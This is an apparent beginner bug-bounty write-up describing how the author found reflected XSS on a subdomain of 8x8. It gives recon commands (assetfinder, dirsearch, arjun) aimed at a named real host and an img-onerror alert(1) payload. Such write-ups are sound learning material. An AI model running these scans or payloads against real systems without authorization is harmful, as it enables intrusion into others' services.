Hi guys. I found xss on 8x8 within 3 minutes and I want to share it step by step. I am writing these write-ups for beginners like me. I think I will learn more as I write and I love it.
STEP 1 — Subdomain Enumeration
assetfinder -subs-only | httprobe
Here is our target : client-beta.global.chalet.8x8.com
STEP — 2 Directory discovery
dirsearch.py -u “client-beta.global.chalet.8x8.com” -e html,json
STEP — 3 Hidden parameters are gold
🔥 :bad_params!! Let’s use arjun to find hidden parameters.
Now we have a get parameter on the blank page. 👌 Let’s try to get XSS !!
Payload : “><img onerror=alert(1) src>
Thank you !!!